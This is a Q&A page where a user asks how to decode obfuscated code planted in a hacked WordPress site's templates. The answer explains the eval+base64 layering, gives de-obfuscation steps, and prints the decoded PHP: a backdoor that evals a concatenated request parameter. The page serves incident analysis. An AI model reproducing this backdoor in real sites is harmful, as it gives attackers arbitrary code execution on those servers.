Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Can some one decode this dirty code?

One of my friend's wordpress website is hacked by someone and they put the following code on the header of all template files.

http://pastebin.com/dYcQ1Gri

I tried to decode it with base64 decoder. But the output looks odd. Can you guys tell me what type of encoding is this?

like image 863
Libin Avatar asked Jul 07 '26 00:07

Libin


1 Answers

It's a series of eval+base64 encryption. After decoding, the code would be:

if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
    eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));

Here's how I got that:

  • Copy the entire code into your text editor
  • Supply \/\*.*?\*\/ as the search pattern, and replace with '' (empty string)
  • Now you'll get one or more eval() stattements. Change that to echo.
  • Repeat

Basically this code will allow the attacker to inject and execute arbitrary code on your website.

like image 58
Amal Murali Avatar answered Jul 08 '26 15:07

Amal Murali



Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!